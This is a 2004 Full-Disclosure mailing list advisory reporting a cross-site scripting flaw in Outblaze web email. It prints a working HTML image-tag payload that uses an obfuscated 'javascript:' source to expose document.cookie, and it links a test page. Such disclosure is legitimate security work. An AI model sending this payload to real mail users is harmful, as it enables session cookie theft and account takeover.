[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Cross-Site Scripting email Outblaze

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Cross-Site Scripting email Outblaze
From: "DarkBicho" <darkbicho@xxxxxxxxxxx>
Date: Sun, 18 Jul 2004 03:05:40 -0700

Original Advisory: http://www.swp-zone.org/archivos/advisory-09.txt

-------------------------------------------------------------------------------------------------

                            :.: Cross-Site Scripting email Outblaze :.: 

  PROGRAM: Outblaze Email
  HOMEPAGE: http://www.outblaze.com/
  BUG: Cross-Site Scripting
  DATE:  23/05/2004
  AUTHOR: DarkBicho
          Web: http://www.darkbicho.tk
          team:  Security Wari Proyects <www.swp-zone.org>
                 PerUnderforce <www.perunderforce.tk>
          Email: darkbicho@xxxxxxxx

-------------------------------------------------------------------------------------------------

1.- Intro:
    ~~~~~~ 
    
    Outblaze Web based e-mail supports SMTP and POP3 Internet protocols,
    which allows it to be used 
    as a front-end to multiple e-mail accounts.  

    some Web that uses Outblaze Email

    linumail.org, Peru.com, bolivia.com y colombia.com etc.


2.- Exploit:
    ~~~~~~~

    In order to operate this coarse single fault with sending following
    code HTML:

    <IMG SRC="javasc&#X0A;ript:alert (document.cookie)";" border="0"
    height="1" width="1">

    Example:

    http://www.swp-zone.org/archivos//linuxmail.gif

3.- Test:
    ~~~~


    http://darkbicho.iberhosting.net/email/



4.- Greetings:
    ~~~~~~~~~

    greetings to my Peruvian group swp, perunderforce.
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

    WEB: http://www.darkbicho.tk
    EMAIL: darkbicho@xxxxxxxx
  
-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \____   \\   \/\/   /|     ___/      
                              /         \\        / |    |        
                             /_____ __  / \__/\  /  |____|       
                             \/       \/        
                                Security Wari Projects 
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[   EOF   
]----------------------------------------------
 
  
  
DarkBicho  
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] Multiple vulnerabilities PostNuke
Next by Date: [Full-Disclosure] [waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3]
Previous by thread: [Full-Disclosure] Multiple vulnerabilities PostNuke
Next by thread: [Full-Disclosure] [waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3]
Index(es):
- Date
- Thread